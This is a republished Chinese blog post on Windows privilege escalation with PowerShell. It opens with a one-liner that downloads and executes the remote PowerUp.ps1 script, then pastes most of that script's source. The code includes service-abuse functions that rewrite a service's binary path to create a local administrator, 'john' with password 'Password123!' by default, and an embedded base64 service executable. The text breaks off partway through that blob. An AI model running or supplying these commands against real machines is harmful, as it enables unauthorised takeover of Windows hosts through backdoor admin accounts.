使用powershell提权的一些技巧
Posted err0">tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了使用powershell提权的一些技巧相关的知识,希望对你有一定的参考价值。
原文:http://fuzzysecurity.com/tutorials/16.html
翻译:http://www.myexception.cn/windows/1752546.html
https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
然后是一个小技巧:
powershell IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1‘);Invoke-AllChecks
powerup.ps1用于进行提权检测,这个脚本会查找 所在服务器的 服务 ,dll ,第三方等 可提权的漏洞信息
可用浏览器直接访问 https://raw.githubusercontent.co ... PowerUp/PowerUp.ps1 下载后使用
PowerUp.ps1 代码如下
<#
PowerUp aims to be a clearinghouse of common Windows privilege escalation
vectors that rely on misconfigurations. See README.md for more information.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
#>
########################################################
#
# Helpers
#
########################################################
Add-Type @"
[System.FlagsAttribute]
public enum ServiceAccessFlags : uint
{
CC = 1,
DC = 2,
LC = 4,
SW = 8,
RP = 16,
WP = 32,
DT = 64,
LO = 128,
CR = 256,
SD = 65536,
RC = 131072,
WD = 262144,
WO = 524288,
GA = 268435456,
GX = 536870912,
GW = 1073741824,
GR = 2147483648
}
"@
function Get-ModifiableFile {
<#
.SYNOPSIS
Helper to return any modifiable file that‘s a part of a passed string.
.EXAMPLE
PS C:\> ‘"C:\Temp\blah.bat" -f "C:\Temp\config.ini"‘ | Get-ModifiableFile
Return the paths "C:\Temp\blah.bat" or "C:\Temp\config.ini" if they are
modifable by the current user context.
#>
[CmdletBinding()]
Param(
[Parameter(ValueFromPipeline=$True, Mandatory = $True)]
[String]
$Path
)
begin {
# false positives
$Excludes = @("MsMpEng.exe", "NisSrv.exe")
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"
}
process {
$CandidateFiles = @()
# test for quote-enclosed args first, returning files that exist on the system
$CandidateFiles += $Path.split("`"‘") | Where-Object { $_ -and (Test-Path $_) }
# now check for space-separated args, returning files that exist on the system
$CandidateFiles += $Path.split() | Where-Object { $_ -and (Test-Path $_) }
# see if we need to skip any excludes
$CandidateFiles | Sort-Object -Unique | Where-Object {$_} | Where-Object {
$Skip = $False
ForEach($Exclude in $Excludes) {
if($_ -match $Exclude) { $Skip = $True }
}
if(!$Skip) {$True}
} | ForEach-Object {
try {
# expand any %VARS%
$FilePath = [System.Environment]::ExpandEnvironmentVariables($_)
# try to open the file for writing, immediately closing it
$File = Get-Item -Path $FilePath -Force
$Stream = $File.OpenWrite()
$Null = $Stream.Close()
$FilePath
}
catch {}
}
}
end {
$ErrorActionPreference = $OrigError
}
}
function Test-ServiceDaclPermission {
<#
.SYNOPSIS
This function checks if the current user has specific DACL permissions
for a specific service with the aid of ‘sc.exe sdshow‘.
.PARAMETER ServiceName
The service name to verify the permissions against. Required.
.PARAMETER Dacl
The DACL permissions. Required.
.EXAMPLE
PS C:\> Test-ServiceDaclPermission -ServiceName VulnSVC -Dacl WPRPDC
Return $True if the current user has Stop (WP), Start (RP),
and ChangeConf (DC) service permissions for ‘VulnSVC‘ otherwise return $False.
.LINK
https://support.microsoft.com/en-us/kb/914392
https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/
#>
[CmdletBinding()]
Param(
[Parameter(Mandatory = $True)]
[string]
$ServiceName,
[Parameter(Mandatory = $True)]
[string]
$Dacl
)
# check if sc.exe exists
if (-not (Test-Path ("$env:SystemRoot\system32\sc.exe"))){
Write-Warning "[!] Could not find $env:SystemRoot\system32\sc.exe"
return $False
}
# query WMI for the service
$TargetService = Get-WmiObject -Class win32_service -Filter "Name=‘$ServiceName‘" | Where-Object {$_}
# make sure we got a result back
if (-not ($TargetService)){
Write-Warning "[!] Target service ‘$ServiceName‘ not found on the machine"
return $False
}
try {
# retrieve DACL from sc.exe
$Result = sc.exe sdshow $TargetService.Name | where {$_}
if ($Result -like "*OpenService FAILED*"){
Write-Warning "[!] Access to service $($TargetService.Name) denied"
return $False
}
$SecurityDescriptors = New-Object System.Security.AccessControl.RawSecurityDescriptor($Result)
# populate a list of group SIDs that the current user is a member of
$Sids = whoami /groups /FO csv | ConvertFrom-Csv | select "SID" | ForEach-Object {$_.Sid}
# add to the list the SID of the current user
$Sids += [System.Security.Principal.WindowsIdentity]::GetCurrent().User.value
ForEach ($Sid in $Sids){
ForEach ($Ace in $SecurityDescriptors.DiscretionaryAcl){
# check if the group/user SID is included in the ACE
if ($Sid -eq $Ace.SecurityIdentifier){
# convert the AccessMask to a service DACL string
$DaclString = [string]([ServiceAccessFlags] $Ace.AccessMask) -replace ‘, ‘,‘‘
# convert the input DACL to an array
$DaclArray = [array] ($Dacl -split ‘(.{2})‘ | Where-Object {$_})
# counter to check how many DACL permissions were found
$MatchedPermissions = 0
# check if each of the permissions exists
ForEach ($DaclPermission in $DaclArray){
if ($DaclString.Contains($DaclPermission.ToUpper())){
$MatchedPermissions += 1
}
else{
break
}
}
# found all permissions - success
if ($MatchedPermissions-eq $DaclArray.Count){
return $True
}
}
}
}
return $False
}
catch{
Write-Warning "Error: $_"
return $False
}
}
function Invoke-ServiceStart {
<#
.SYNOPSIS
Starts a specified service, first enabling the service if it was marked as disabled.
.PARAMETER ServiceName
The service name to start. Required.
.EXAMPLE
PS C:\> Invoke-ServiceStart -ServiceName VulnSVC
Start the ‘VulnSVC‘ service.
#>
[CmdletBinding()]
Param(
[Parameter(ValueFromPipeline=$True, Mandatory = $True)]
[String]
$ServiceName
)
process {
# query WMI for the service
$TargetService = Get-WmiObject -Class win32_service -Filter "Name=‘$ServiceName‘" | Where-Object {$_}
# make sure we got a result back
if (-not ($TargetService)){
Write-Warning "[!] Target service ‘$ServiceName‘ not found on the machine"
return $False
}
try {
# enable the service if it was marked as disabled
if ($TargetService.StartMode -eq "Disabled"){
$r = Invoke-ServiceEnable -ServiceName "$($TargetService.Name)"
if (-not $r){
return $False
}
}
# start the service
Write-Verbose "Starting service ‘$($TargetService.Name)‘"
$Null = sc.exe start "$($TargetService.Name)"
Start-Sleep -s .5
return $True
}
catch{
Write-Warning "Error: $_"
return $False
}
}
}
function Invoke-ServiceStop {
<#
.SYNOPSIS
Stops a specified service.
.PARAMETER ServiceName
The service name to stop. Required.
.EXAMPLE
PS C:\> Invoke-ServiceStop -ServiceName VulnSVC
Stop the ‘VulnSVC‘ service.
#>
[CmdletBinding()]
Param(
[Parameter(ValueFromPipeline=$True, Mandatory = $True)]
[String]
$ServiceName
)
process {
# query WMI for the service
$TargetService = Get-WmiObject -Class win32_service -Filter "Name=‘$ServiceName‘" | Where-Object {$_}
# make sure we got a result back
if (-not ($TargetService)){
Write-Warning "[!] Target service ‘$ServiceName‘ not found on the machine"
return $False
}
try {
# stop the service
Write-Verbose "Stopping service ‘$($TargetService.Name)‘"
$Result = sc.exe stop "$($TargetService.Name)"
if ($Result -like "*Access is denied*"){
Write-Warning "[!] Access to service $($TargetService.Name) denied"
return $False
}
elseif ($Result -like "*1051*") {
# if we can‘t stop the service because other things depend on it
Write-Warning "[!] Stopping service $($TargetService.Name) failed: $Result"
return $False
}
Start-Sleep 1
return $True
}
catch{
Write-Warning "Error: $_"
return $False
}
}
}
function Invoke-ServiceEnable {
<#
.SYNOPSIS
Enables a specified service.
.PARAMETER ServiceName
The service name to enable. Required.
.EXAMPLE
PS C:\> Invoke-ServiceEnable -ServiceName VulnSVC
Enables the ‘VulnSVC‘ service.
#>
[CmdletBinding()]
Param(
[Parameter(ValueFromPipeline=$True, Mandatory = $True)]
[String]
$ServiceName
)
process {
# query WMI for the service
$TargetService = Get-WmiObject -Class win32_service -Filter "Name=‘$ServiceName‘" | Where-Object {$_}
# make sure we got a result back
if (-not ($TargetService)){
Write-Warning "[!] Target service ‘$ServiceName‘ not found on the machine"
return $False
}
try {
# enable the service
Write-Verbose "Enabling service ‘$TargetService.Name‘"
$Null = sc.exe config "$($TargetService.Name)" start= demand
return $True
}
catch{
Write-Warning "Error: $_"
return $False
}
}
}
function Invoke-ServiceDisable {
<#
.SYNOPSIS
Disables a specified service.
.PARAMETER ServiceName
The service name to disable. Required.
.EXAMPLE
PS C:\> Invoke-ServiceDisable -ServiceName VulnSVC
Disables the ‘VulnSVC‘ service.
#>
[CmdletBinding()]
Param(
[Parameter(ValueFromPipeline=$True, Mandatory = $True)]
[String]
$ServiceName
)
process {
# query WMI for the service
$TargetService = Get-WmiObject -Class win32_service -Filter "Name=‘$ServiceName‘" | Where-Object {$_}
# make sure we got a result back
if (-not ($TargetService)){
Write-Warning "[!] Target service ‘$ServiceName‘ not found on the machine"
return $False
}
try {
# disable the service
Write-Verbose "Disabling service ‘$TargetService.Name‘"
$Null = sc.exe config "$($TargetService.Name)" start= disabled
return $True
}
catch{
Write-Warning "Error: $_"
return $False
}
}
}
########################################################
#
# Service enumeration
#
########################################################
function Get-ServiceUnquoted {
<#
.SYNOPSIS
Returns the name and binary path for services with unquoted paths
that also have a space in the name.
.EXAMPLE
PS C:\> $services = Get-ServiceUnquoted
Get a set of potentially exploitable services.
.LINK
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb
#>
# find all paths to service .exe‘s that have a space in the path and aren‘t quoted
$VulnServices = Get-WmiObject -Class win32_service | Where-Object {$_} | Where-Object {($_.pathname -ne $null) -and ($_.pathname.trim() -ne "")} | Where-Object {-not $_.pathname.StartsWith("`"")} | Where-Object {-not $_.pathname.StartsWith("‘")} | Where-Object {($_.pathname.Substring(0, $_.pathname.IndexOf(".exe") + 4)) -match ".* .*"}
if ($VulnServices) {
ForEach ($Service in $VulnServices){
$Out = New-Object PSObject
$Out | Add-Member Noteproperty ‘ServiceName‘ $Service.name
$Out | Add-Member Noteproperty ‘Path‘ $Service.pathname
$Out | Add-Member Noteproperty ‘StartName‘ $Service.startname
$Out | Add-Member Noteproperty ‘AbuseFunction‘ "Write-ServiceBinary -ServiceName ‘$($Service.name)‘ -Path <HijackPath>"
$Out
}
}
}
function Get-ServiceFilePermission {
<#
.SYNOPSIS
This function finds all services where the current user can
write to the associated binary or its arguments.
If the associated binary (or config file) is overwritten,
privileges may be able to be escalated.
.EXAMPLE
PS C:\> Get-ServiceFilePermission
Get a set of potentially exploitable service binares/config files.
#>
Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pathname} | ForEach-Object {
$ServiceName = $_.name
$ServicePath = $_.pathname
$ServiceStartName = $_.startname
$ServicePath | Get-ModifiableFile | ForEach-Object {
$Out = New-Object PSObject
$Out | Add-Member Noteproperty ‘ServiceName‘ $ServiceName
$Out | Add-Member Noteproperty ‘Path‘ $ServicePath
$Out | Add-Member Noteproperty ‘ModifiableFile‘ $_
$Out | Add-Member Noteproperty ‘StartName‘ $ServiceStartName
$Out | Add-Member Noteproperty ‘AbuseFunction‘ "Install-ServiceBinary -ServiceName ‘$ServiceName‘"
$Out
}
}
}
function Get-ServicePermission {
<#
.SYNOPSIS
This function enumerates all available services and tries to
open the service for modification, returning the service object
if the process doesn‘t failed.
.EXAMPLE
PS C:\> Get-ServicePermission
Get a set of potentially exploitable services.
#>
# check if sc.exe exists
if (-not (Test-Path ("$Env:SystemRoot\System32\sc.exe"))) {
Write-Warning "[!] Could not find $Env:SystemRoot\System32\sc.exe"
$Out = New-Object PSObject
$Out | Add-Member Noteproperty ‘ServiceName‘ ‘Not Found‘
$Out | Add-Member Noteproperty ‘Path‘ "$Env:SystemRoot\System32\sc.exe"
$Out | Add-Member Noteproperty ‘StartName‘ $Null
$Out | Add-Member Noteproperty ‘AbuseFunction‘ $Null
$Out
}
$Services = Get-WmiObject -Class win32_service | Where-Object {$_}
if ($Services) {
ForEach ($Service in $Services){
# try to change error control of a service to its existing value
$Result = sc.exe config $($Service.Name) error= $($Service.ErrorControl)
# means the change was successful
if ($Result -contains "[SC] ChangeServiceConfig SUCCESS"){
$Out = New-Object PSObject
$Out | Add-Member Noteproperty ‘ServiceName‘ $Service.name
$Out | Add-Member Noteproperty ‘Path‘ $Service.pathname
$Out | Add-Member Noteproperty ‘StartName‘ $Service.startname
$Out | Add-Member Noteproperty ‘AbuseFunction‘ "Invoke-ServiceAbuse -ServiceName ‘$($Service.name)‘"
$Out
}
}
}
}
function Get-ServiceDetail {
<#
.SYNOPSIS
Returns detailed information about a specified service.
.PARAMETER ServiceName
The service name to query for. Required.
.EXAMPLE
PS C:\> Get-ServiceDetail -ServiceName VulnSVC
Gets detailed information about the ‘VulnSVC‘ service.
#>
[CmdletBinding()]
Param(
[Parameter(ValueFromPipeline=$True, Mandatory = $True)]
[String]
$ServiceName
)
process {
Get-WmiObject -Class win32_service -Filter "Name=‘$ServiceName‘" | Where-Object {$_} | ForEach-Object {
try {
$_ | Format-List *
}
catch{
Write-Warning "Error: $_"
$null
}
}
}
}
########################################################
#
# Service abuse
#
########################################################
function Invoke-ServiceAbuse {
<#
.SYNOPSIS
This function stops a service, modifies it to create a user, starts
the service, stops it, modifies it to add the user to the specified group,
stops it, and then restores the original EXE path. It can also take a
custom -CMD argument to trigger a custom command instead of adding a user.
.PARAMETER ServiceName
The service name to manipulate. Required.
.PARAMETER UserName
The [domain\]username to add. If not given, it defaults to "john".
Domain users are not created, only added to the specified localgroup.
.PARAMETER Password
The password to set for the added user. If not given, it defaults to "Password123!"
.PARAMETER LocalGroup
Local group name to add the user to (default of Administrators).
.PARAMETER Command
Custom local command to execute.
.EXAMPLE
PS C:\> Invoke-ServiceAbuse -ServiceName VulnSVC
Abuses service ‘VulnSVC‘ to add a localuser "john" with password
"Password123! to the machine and local administrator group
.EXAMPLE
PS C:\> Invoke-ServiceAbuse -ServiceName VulnSVC -UserName "TESTLAB\john"
Abuses service ‘VulnSVC‘ to add a the domain user TESTLAB\john to the
local adminisrtators group.
.EXAMPLE
PS C:\> Invoke-ServiceAbuse -ServiceName VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users"
Abuses service ‘VulnSVC‘ to add a localuser "backdoor" with password
"password" to the machine and local "Power Users" group
.EXAMPLE
PS C:\> Invoke-ServiceAbuse -ServiceName VulnSVC -Command "net ..."
Abuses service ‘VulnSVC‘ to execute a custom command.
#>
[CmdletBinding()]
Param(
[Parameter(ValueFromPipeline=$True, Mandatory = $True)]
[String]
$ServiceName,
[String]
$UserName = "john",
[String]
$Password = "Password123!",
[String]
$LocalGroup = "Administrators",
[String]
$Command
)
process {
# query WMI for the service
$TargetService = Get-WmiObject -Class win32_service -Filter "Name=‘$ServiceName‘" | Where-Object {$_}
# make sure we got a result back
if ($TargetService) {
$ServiceAbused = $TargetService.Name
$UserAdded = $Null
$PasswordAdded = $Null
$GroupnameAdded = $Null
try {
# check if sc.exe exists
if (-not (Test-Path ("$Env:SystemRoot\System32\sc.exe"))){
throw "Could not find $Env:SystemRoot\System32\sc.exe"
}
# try to enable the service it was disabled
$RestoreDisabled = $False
if ($TargetService.StartMode -eq "Disabled") {
Write-Verbose "Service ‘$ServiceName‘ disabled, enabling..."
if(-not $(Invoke-ServiceEnable -ServiceName $ServiceName)) {
throw "Error in enabling disabled service."
}
$RestoreDisabled = $True
}
# extract the original path and state so we can restore it later
$OriginalPath = $TargetService.PathName
$OriginalState = $TargetService.State
Write-Verbose "Service ‘$ServiceName‘ original path: ‘$OriginalPath‘"
Write-Verbose "Service ‘$ServiceName‘ original state: ‘$OriginalState‘"
$Commands = @()
if($Command) {
# only executing a custom command
$Commands += $Command
}
elseif($UserName.Contains("\")) {
# adding a domain user to the local group, no creation
$Commands += "net localgroup $LocalGroup $UserName /add"
}
else {
# creating a local user and adding to the local group
$Commands += "net user $UserName $Password /add"
$Commands += "net localgroup $LocalGroup $UserName /add"
}
foreach($Cmd in $Commands) {
if(-not $(Invoke-ServiceStop -ServiceName $TargetService.Name)) {
throw "Error in stopping service."
}
Write-Verbose "Executing command ‘$Cmd‘"
$Result = sc.exe config $($TargetService.Name) binPath= $Cmd
if ($Result -contains "Access is denied."){
throw "Access to service $($TargetService.Name) denied"
}
$Null = Invoke-ServiceStart -ServiceName $TargetService.Name
}
# cleanup and restore the original binary path
Write-Verbose "Restoring original path to service ‘$ServiceName‘"
$Null = sc.exe config $($TargetService.Name) binPath= $OriginalPath
# try to restore the service to whatever state it was
if($RestoreDisabled) {
Write-Verbose "Re-disabling service ‘$ServiceName‘"
$Result = sc.exe config $($TargetService.Name) start= disabled
}
elseif($OriginalState -eq "Paused") {
Write-Verbose "Starting and then pausing service ‘$ServiceName‘"
$Null = Invoke-ServiceStart -ServiceName $TargetService.Name
$Null = sc.exe pause $($TargetService.Name)
}
elseif($OriginalState -eq "Stopped") {
Write-Verbose "Leaving service ‘$ServiceName‘ in stopped state"
}
else {
$Null = Invoke-ServiceStart -ServiceName $TargetService.Name
}
}
catch {
Write-Warning "Error while modifying service ‘$ServiceName‘: $_"
$Commands = @("Error while modifying service ‘$ServiceName‘: $_")
}
}
else {
Write-Warning "Target service ‘$ServiceName‘ not found on the machine"
$Commands = "Not found"
}
$Out = New-Object PSObject
$Out | Add-Member Noteproperty ‘ServiceAbused‘ $ServiceAbused
$Out | Add-Member Noteproperty ‘Command‘ $($Commands -join " && ")
$Out
}
}
function Write-ServiceBinary {
<#
.SYNOPSIS
Takes a precompiled C# service executable and binary patches in a
custom shell command or commands to add a local administrator.
It then writes the binary out to the specified location.
Domain users are only added to the specified LocalGroup.
.PARAMETER ServiceName
The service name the EXE will be running under. Required.
.PARAMETER Path
Path to write the binary out to, defaults to the local directory.
.PARAMETER UserName
The [DOMAIN\username] to add, defaults to ‘john‘.
.PARAMETER Password
The password to set for the added user, default to ‘Password123!‘.
.PARAMETER LocalGroup
Local group to add the user to, defaults to ‘Administrators‘.
.PARAMETER Command
A custom command to execute.
.EXAMPLE
PS C:\> Write-ServiceBinary -ServiceName VulnSVC
Writes the service binary for VulnSVC that adds a local administrator
to the local directory.
.EXAMPLE
PS C:\> Write-ServiceBinary -ServiceName VulnSVC -UserName "TESTLAB\john"
Writes the service binary for VulnSVC that adds TESTLAB\john to the local
administrators to the local directory.
.EXAMPLE
PS C:\> Write-ServiceBinary -ServiceName VulnSVC -UserName backdoor -Password Password123!
Writes the service binary for VulnSVC that adds a local administrator of
name ‘backdoor‘ with password ‘Password123!‘ to the local directory.
.EXAMPLE
PS C:\> Write-ServiceBinary -ServiceName VulnSVC -Command "net ..."
Writes the service binary for VulnSVC that executes a local command
to the local directory.
#>
[CmdletBinding()]
Param(
[Parameter(ValueFromPipeline=$True, Mandatory = $True)]
[String]
$ServiceName,
[String]
$ServicePath = "service.exe",
[String]
$UserName = "john",
[String]
$Password = "Password123!",
[String]
$LocalGroup = "Administrators",
[String]
$Command
)
begin {
# the raw unpatched service binary
$B64Binary = "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UmVmbGVjdGlvbgBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlDdWx0dXJlQXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBDb21WaXNpYmxlQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAQXNzZW1ibHlWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAU3lzdGVtLkRpYWdub3N0aWNzAERlYnVnZ2FibGVBdHRyaWJ1dGUARGVidWdnaW5nTW9kZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAElEaXNwb3NhYmxlAENvbnRhaW5lcgBTdHJpbmcAVHJpbQBzZXRfU2VydmljZU5hbWUAUHJvY2VzcwBTdGFydABTeXN0ZW0uVGhyZWFkaW5nAFRocmVhZABTbGVlcABFbnZpcm9ubWVudABFeGl0AFJ1bgAARUEAQQBBACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAAL/3LwBDACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA